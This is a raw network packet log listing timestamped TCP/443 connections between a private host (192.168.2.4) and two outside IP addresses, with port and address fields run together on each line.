                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.275141001 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.275160074 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.284758091 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.284826994 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.284888029 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.294389963 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.294461012 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.294492960 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.308345079 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.308547974 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.308610916 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.321906090 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.322171926 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.322233915 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.335212946 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.335272074 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.335357904 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.348083019 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.348175049 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.348236084 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.376039028 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.376065016 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.376215935 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.376312017 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.376357079 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.380371094 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.383838892 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.383917093 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.383985043 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.427753925 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.448513985 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.452385902 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.452610016 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.452677965 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.462985039 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.463011980 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.463066101 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.463145971 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.463197947 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.471492052 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.479633093 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.479762077 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.479787111 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.479850054 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.479922056 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.488717079 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.500272036 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.500288963 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.500468969 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.500533104 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.500591993 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.511698961 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.513170004 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.513252020 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.513314009 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.523988962 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.524202108 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.524265051 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.535475969 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.535553932 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.535615921 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.549643993 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.549810886 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.549890995 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.556932926 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.557116985 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.557179928 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.567329884 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.567399025 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.567461967 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.576997995 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.577198029 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.577260971 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.586983919 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.587219954 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.587282896 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.596257925 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.596466064 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.596529007 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.605986118 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.606165886 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.606229067 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.621819973 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.621998072 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.622114897 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.625433922 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.625612974 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.625714064 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.629618883 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.629704952 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.629765987 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.638484955 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.638665915 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.638727903 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.646996975 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.647058964 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.647120953 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.653903008 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.654073000 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.654134989 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.658128023 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.658329010 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.658391953 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.663585901 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.663753986 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.663816929 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.668713093 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.668908119 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.668971062 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.674393892 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.674597979 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.674659967 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.680460930 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.680633068 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.680695057 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.685206890 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.685394049 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.685473919 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.692394018 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.692594051 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.692655087 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.695622921 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.695749044 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.695796013 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.695863962 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.696314096 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.703538895 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.704665899 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.704849958 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.704912901 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.704950094 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.705004930 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.705107927 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.705138922 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:52.137770891 CET49761443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:52.137811899 CET44349761142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:52.138201952 CET49761443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:52.138329983 CET49761443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:52.138359070 CET44349761142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.443098068 CET49764443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.443150997 CET4434976494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.443211079 CET49764443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.443424940 CET49764443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.443438053 CET4434976494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.831156015 CET44349761142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.832766056 CET49761443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.832828045 CET44349761142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.833187103 CET44349761142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.833606005 CET49761443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.833720922 CET44349761142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.879991055 CET49761443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.516120911 CET49761443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.600766897 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.600807905 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.604063034 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.604399920 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.604412079 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.844048023 CET4434976494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.844114065 CET49764443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.844505072 CET49764443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.844511986 CET4434976494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.846143961 CET49764443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.846148968 CET4434976494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:55.894669056 CET4434976494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:55.894731045 CET49764443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:55.894737005 CET4434976494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:55.894773006 CET49764443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:55.895452023 CET49764443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:55.895467997 CET4434976494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.002130985 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.002216101 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.002558947 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.002566099 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004131079 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004136086 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004204988 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004216909 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004261017 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004264116 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004291058 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004296064 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004354000 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004359961 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004401922 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004409075 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004424095 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004436016 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004482031 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004489899 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004532099 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004538059 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004558086 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004564047 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004576921 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004580021 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004600048 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004611969 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004657030 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004662991 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004673004 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004679918 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004688978 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004698038 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004730940 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004736900 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004743099 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004745960 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004776955 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004781961 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004787922 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004791021 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.601145983 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.601186991 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.601288080 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.601495028 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.601512909 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:57.832699060 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:57.832763910 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:57.832778931 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:57.832822084 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:57.833491087 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:57.833508015 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:58.003592014 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:58.003664970 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:58.003983974 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:58.003989935 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:58.005605936 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:58.005613089 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:58.005760908 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:58.005772114 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:58.005878925 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:58.005908966 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:58.006181955 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:58.006196022 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:58.664318085 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:58.664402962 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:58.664494038 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:58.664644003 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:58.664663076 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:59.464529037 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:59.464613914 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:59.464631081 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:59.464678049 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:59.464709997 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:59.464770079 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:59.465409994 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:59.465421915 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:59.667488098 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:59.667521000 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:59.667587996 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:59.667767048 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:59.667774916 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:00.059931993 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:00.060251951 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:00.060544968 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:00.060597897 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:00.061969995 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:00.062005997 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:00.062087059 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:00.062119961 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:00.062230110 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:00.062279940 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:00.062479019 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:00.062525988 CET4434977594.130.188.57192.168.2.4
